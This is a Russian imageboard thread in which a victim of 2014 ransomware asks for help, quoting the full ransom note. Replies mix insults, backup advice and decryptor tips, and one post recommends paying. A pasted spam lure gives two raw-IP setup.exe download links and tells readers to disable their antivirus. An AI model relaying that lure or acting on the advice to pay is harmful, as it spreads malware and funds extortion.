>>1029968
>Подскажите что можно сделать кроме оплаты им денег и форматирования?
Восстановиться из бэкапа?
>>1029979
сомневаюсь, да и файлы эти ни где не хронились, были только на этом компе.
>>1029989
1. Не веди переговоры с терористами.
2. Используй Unix системы.
3. Делай бекапы, тупой одмин.
4. Объясняй пользователям, что открывать все подряд файлы в приложении к почте с неизвестного адреса, без проверки MIME-type, под администратором - долбоёбизм.
>>1029994
Я не админ, я простым менеджером работаю, а Админ тип не знает что делать. Вчера один комп отдали в ремонт сказали что через неделю вернут. Хз решат проблему или нет.А поощрять мошенников я не хочу, но вот руководство уже задумывается над переводом им денег.
>>1029968
1. Обращаешься в полицию
2. Мошенники с паяльником в жопе сами расшифровывают твои файлы.
>>1030001
> Я не админ
Тебе диаграмму решения проблем запостить или сам найдёшь?
> один комп отдали в ремонт сказали что через неделю вернут
Лол. Сначала понабирают эникейщиков на должность системных администраторов (Конечно, хули они просят по 100к? Вон, мой младший ерохин целый день за компутером сидит и иксцель мне так запогромировал, что я его с рабочего стола запускаю. Да и пристроен будет дитятечко. А я тебе в жопу дам, ХР-манагер ты мой любимый).
> решат проблему или нет
Не решат. Ну разве что у них там под кроватью квантовый суперкомпьютер спрятан.
>>1029968
>RSA-1024
Ага, за 5минут все данные шифранули. Жызнена.
Думай логически, если все зашифровано, то как работает система, ключ знает или шифра все-таки нет?
Если шифранули локально, то хуй знает.
Скорей всего дописали в расширения всякую бяку и поменяли права на редактирование. Попробуй переставить hhd на другой комп и исправить расширения.
НЕ СИДЕТЬ ПОД РУТОМ!!!!
>>1029968
1. Плачешь и рвешь на себе волосы.
2. Каешься, что виндовс-говноед.
3. Смиряешься с безысходностью.
Мимо ГНУ/Линукс-бог
Ахах, забудьте о вышесказаном.
Я сосу хуи и ем говно
Мимо ГНУ/Линукс-бог
У вас есть два файла юник.кей и прайвет.кей. По этим файлам можно определить сможете ли вы восстановить данные самостоятельно. На форуме др веба и Касперского есть инфа.
Если поймали вчера это письмо - самостоятельно ничего сделать не сможете. Единственный выход платить чувакам этим.
После шифровки ваших файлов злоумышленники получают инфу о количестве зашифрованных файлов. Расшифровка до 4000 файлов - 120 евро. Больше 4000 файлов по курсу 0.037 евро за файл.
Сам открыл подобное письмо от доверенного контрагента с нормальным текстом, зашифровались файлы к которым имеет доступ данная учетка. Ничего особо важного не пострадало.
Раз в день теперь бекапить будем. И сделаем проверку всех почтовых вложений.
Олсо, сейчас злоумышленники обкатывают технологию, тренируются. Потом возьмутся за крупные корпорации. Там много админов распиздяев. Инфа с их блога.
Поясните за алгоритмы шифрования. Чем больше он битный(256, 512, 1024) тем надёжнее?
>>1030320
>[OP]
>>RSA-1024
>Ага, за 5минут все данные шифранули. Жызнена.
>Думай логически, если все зашифровано, то как работает система, ключ знает или шифра все-таки нет?
10к файлов зашифровало за час. Один ключ у опа, второй у злоумышленников.
Мимо пострадавший.
Виндопроблемы.
BSD боярин
>>1030338
Для обычного компьютера, да. Квантовому похуй хотя его еще не придумали
Опушка те файлы ты скинуть можешь?
>>1030360 Тащемта ИРЛ существуют квантоустойчивые алгоритмы шифрования. Если я буду шифровать свой трафик по 4096-битному алгоритму то его левый васян не расшифрует?
>>1030360
> его еще не придумали
Ошибаешься, няша, его даже тестируют во всю уже. inb4: ко-ко-ко! ито ни палнаценный кфантавый! ко-ко-ко
https://en.wikipedia.org/wiki/D-Wave_Systems
https://www.google.com/search?q=D-Wave
>>1030361
https://en.wikipedia.org/wiki/CryptoLocker
habrahabr.ru/post/206830/
У него, кстати, даже SDK вроде как есть, лол. Можешь собрать свой собственный cryptolocker. С емейлом и текстом-пугалкой.
Тут как-то анон выкладывал. Попробую найти. Хотя можно в /и/ попробовать попросить.
>>1030360
>пок-пок-квантовый
>пок-пок-ломать-защиту
Ебаные гуманитарии...
>>1029968
>У нас есть гарантии того, что после оплаты будет передан Ваш уникальный ключ
Проиграл.
>Подскажите что можно сделать кроме оплаты им денег и форматирования?
Ну, ещё можно оставить всё как есть. Будешь счастливым обладателем кучки высокоэнтропийных данных.
А ещё можно вскрыть их шифровальщик и посмотреть, насколько хорошо реализована криптография.
>>1030335
>открыл подобное письмо от доверенного контрагента с нормальным текстом, зашифровались файлы
Отчёт_за_второй_квартал_2014.pdf.exe?
>>1030391
Мань, ты прав в какой-то степени. Но там про алгоритмы шифрования. Без привязки к архитектуре.
>>1030391
RSA, технарь ты наш дорогой, не сильно устойчив. Если научатся быстро раскладывать на простые множители (почитай про Шора), то соснёт этот алгоритм (и ещё несколько) с проглотом.
Но есть ещё эллиптические кривые. Так что живы будем не помрём.
>>1029968
Если троян уже закончил работать (процесс завершился), нихуя уже не сделаешь.
Инфа 146%, лично сталкивался, реверсили трояна с безопасниками, соснули.
Алсо, троян стрый, ящик давно заабужен, платить некуда.
кому приходили подобные письма с вложениями выложите их пожалуста на обменник или ргхост. самое вложение.pdf.exe
thank you!
>>1030445
Ишь чего захотел! Хуй тебе, а не спину белую, сам ищи.
Адекват в треде. Слушай короче. Съёбывай из этой конторы, пиши заяву и насри директору на стол. В рот ебать такие фирмы с такими админами.
Момошёл, закатился. Вангую что файлы шифруются так же, как сохдаётся архив, то есть, в рахделе создаётся шифрованная копия файла, оригинальный файл по окончанию шифрования удаляется. Если ты достаточно везуч, что-то сможешь восстановить утилитами для восстановления удалённых файлов, если конечно для удаления не используется АРМЕЙСКИЙ АЛГОРИТМ.
>>1030573
>Если ты достаточно везуч
>если конечно для удаления не используется АРМЕЙСКИЙ АЛГОРИТМ
А то, что так или иначе вновь создаваемые шифрованные файлы постепенно будут попадать на кластеры с ранее существовавшими нормальными данными, необратимо их затирая, ты не учёл? Здесь даже гарантированное затирание (хоть в 1 проход нулями, хоть в 35 рандомом - с программной точки зрения абсолютно однохуйственно) не требуется по большому счёту.
>>1030609
Он же написал «если ты достаточно везуч, что-то сможешь восстановить».
>>1030620
Ничего он не восстановит. Утилита пишет прямо в исходный файл. Проверяли.
>>1029968
>письмо, с название договор, мы кок раз ждали от одной фирмы
да у вас крыса завелась или какая то особь человека заходит куда не надо, тыкает на что не надо, в следствие чего сама не зная слила всю инфу и еще вариант недавно уволеный сотрудник
ОП, выкладывай вложение, сам шифровальщик и ключи, попробую тебе помочь. Или ты просто по ныть тред создал?
>>1029968
если этим зашифровано то можно расшифровать http://securelist.ru/blog/issledovaniya/3759/cryptolocker-ohotitsya-za-vashimi-den-gami/
>>1029968
Попробуй на сайтах дрвеба и кошмарского поискать ключи для этих васяношифровальщиков. Те, к которым есть дешифратор и хоть кто-то зарепортил, обычно имеют строку в списке.
Мы, группа хакеров из Российской Федерации, очень обеспокоены всеми
санкциями, которые европейские страны ввели против нашей Родины. Мы
запрограммировали наш ответ, далее вы найдете ссылки на написанную
нами программу. Запустите ее на Вашем компьютере, и она будет скрытно
атаковать правительственные сайты стран, которые ввели данные санкции.
Наша программа работает скрытно, использует не более 5% канала, не
больше 50 Мб траффика в сутки и не использует процессорное время.
После ребута Вашего компьютера программа завершает свою активность, и
если Вы хотите - то Вы можете запустить ее заново.
Победа будет за нами!
Ссылка на программу: http://113.41.110.111/setup.exe
Дополнительный линк: http://195.114.158.61/setup.exe
При необходимости отключите временно свой антивирус.
А чому хакеры сидят на венде?
Тому шо хакер никогда себя хакером не назовет.
>Вчера один комп отдали в ремонт сказали что через неделю вернут. Хз решат проблему или нет.
Бвахахах, ох лол. Систему смотри чтоб не переустановили)))
>Обращаешься в полицию
Феерический дебил. Здесь ещё взломщики довольно странные попались. Когда я работал в одной компании, занимающейся IT-аутсорсингом, и один из клиентов столкнулся с похожей проблемой, адреса все вообще были в тормейле. Удачи найти.
Но даже учитывая тот факт, что это гугл, очень сомневаюсь, что наши дауны будут вообще делать какие-либо запросы. И сомневаюсь, что им ответят. И еще больше я сомневаюсь, что люди, которые написали программу-шифровалку не знают, что такое VPN и сидят на почте с белых адресов.
Для всех кукарекающих по треду: это не виндопроблемы, это дегенератопроблемы. Не знаю, насколько нужно быть тупым, чтобы во что-то подобное вляпаться. Система не виновата, что она такая популярная, что под нее все пишут вирусы, а большая часть её юзеров - дегенераты.
> хакеров из Российской Федерации
> очень обеспокоены всеми санкциям
Прокатит для первого анала и сикилёв-тв.
Тоже нарвался на такой вирус, данные были очень важны и их было много. Написал по данному эмейлу, ответили в течении часа. Перевел им 350 евро и сразу получил ключ. Не кидают и отвечают быстро. Рекомендую.
Всем админам на заметку. покупаете внешний HDD 2TB
Стоит не больше 5 тысяч.
Он стоит копейки подключается через USB.
Раз в неделю, месяц делаете бекап. всех всех своих данных .
Стоит не больше 5 тысяч.
Он стоит копейки подключается через USB.
Раз в неделю, месяц делаете бекап. всех всех своих данных .
Храните данные на файловых серверах, с шедоукопи и бэкапами на ленты.
И да, спермодебилы обязаны страдать
И да, спермодебилы обязаны страдать
Как здорово то. Подскажи где скачать.
Так вот как выглядит построение ботнета методом социальной инженерии.
>Инфа с их блога.
линк?
В итоге на ремонте сказали все сделаем но за 80к мы их послали, нашли через знакомых чувака сказал что сделает примерно за неделю и возьмет 4к. Файлы не скину у меня их нет, жесткий диск отдали.
> нашли через знакомых чувака сказал что сделает примерно за неделю и возьмет 4к
Лол. Не забудь потом кулстори напилить сюда, как он окончательно наебнул все ваши охуительно важненькие документики.
Вот же пользователи необучаемые. Блять пиздец просто.
ну так там было две версии. Для укров - своя. Или даже три. источник - жж ru_sysadmin
>Лол. Не забудь потом кулстори напилить сюда, как он окончательно наебнул все ваши охуительно важненькие документики.
ну может тот чувак у какеров лоукост-бренд ) если те пидоры не заплатили сразу, то хоть что-то с них взять.
>Не хранить важные данные на сервере
>Не делать регулярные бекапы
>Админ
это не админ, это эникейщик.
А работодатель здесь заплатит дважды. Все как в поговорке.
Хороший урок. По-больше бы локеров наловили.
Вкратце попробую описать мою проблему.
Вчера на работе на общий е-майл пришло письмо, с название договор, мы кок раз ждали от одной фирмы. Ну и парочка сотрудников его скачала и запустили и все файлы заархивировались, и появилось парочка файлов на рабочем столе, одна из них с инструкцией вот что в ней написано:
Здравствуйте. Почему все файлы получили расширение paycrypt@gmail_com?
Ваши файлы были ЗАБЛОКИРОВАНЫ при помощи алгоритма RSA-1024
1. Это инструкция, которая поможет понять и решить Вашу проблему
2. Для решения данной проблемы нужно объединить наши общие ресурсы:
Наши ресурсы:
- Только мы можем разблокировать файлы
- У нас есть гарантии того, что после оплаты будет передан Ваш уникальный ключ для разблокировки
- Мы можем минимизировать Ваши риски как до оплаты, так и после
- Мы можем предоставить те консультации, которые минимизируют подобные случаи в будущем
Ваши ресурсы:
- электронная валюта
- e-mail
3. У Вас есть два варианта:
а) Форматировать диски и вернуть 0% файлов - неразумно
б) Скоммуницировать с нами, договориться за дешифрование и вернуть все файлы обратно - вполне правильно
в) Почта [email protected]
Для системных администраторов:
1. Ваш случай - ассиметричное шифрование RSA-1024, используется в военной сфере. Подобрать/взломать его невозможно.
При шифровании, в разные места компьютера были скопированы специальные файлы 'KEY.PRIVATE' и 'UNIQUE.PRIVATE'. Не потеряйте их!
Для каждого компьютера ключ создается новый. Он уникальный и в нём содержится код на дешифровку. Он Вам и нужен.
2. Итак, наши с Вами следующие действия:
2.1. С нами связь держать можно только по электронной почте [email protected]
2.2. В начале Вам необходимо получить гаранти того, что мы можем расшифровать файлы
2.3. Контактируете с нами. Структура Вашего e-mail письма:
- вложения 'KEY.PRIVATE' и ID-файла 'UNIQUE.PRIVATE' (!!) - поищите его на компьютере, без него восстановление невозможно
- 1-2 зашифрованных файла для проверки возможности расшифровки
- приблизительное колл-во зашифрованных файлов / компьютеров
2.4. В течение 1-го часа Вы получите гарантию и стоимость на Ваш ключ
2.5. Далее производится оплата, минимальная стоимость от 140 евро.
2.6. Мы отправляем Вам ключ, Вы его кладете в одну папку с полученным дешифратором
2.7. При запуске дешифратора производится скрытая дешифровка данных. Процесс запускать более 1-го раза не стоит.
2.8. Процесс дешифрования может занимать до 12-ти часов в скрытом режиме. По окончании процесса компьютер перезагрузится.
Советы:
0) Универсального дешифратора в сети Интернет не будет, ждать его нет смысла. Более того, у Вас есть ограничение по сроку годности ключа.
1) После приобретения ключа, сделайте копию всех важных зашифрованных файлов на внешние носители.
2) В процессе дешифрования желательно не трогать компьютер, (!) ДВА раза запускать с ключем дешифратор не нужно.
3) Если думаете, что вместо дешифратора Вы получите очередной вирус, тогда поставьте вирт.систему и там проведите дешифровку.
4) Если какие-то файлы не будут окончательно расшифрованы, мы дорасшифруем вручную (в архиве по почте)
5) Мы также, осознаем то, что Ваши файлы могут быть очень ценны для Вас, поэтому мы понимаем важность их восстановления.
6) В особых случаях, мы пойдем с Вами на компромисс.
7) Как защититься от этого: еженедельное резервное копирование. Не открывайте подозрительные файлы. Используйте Unix системы.
Процесс шифрования закончен: 19.08.2014 / 10:43
Подскажите что можно сделать кроме оплаты им денег и форматирования?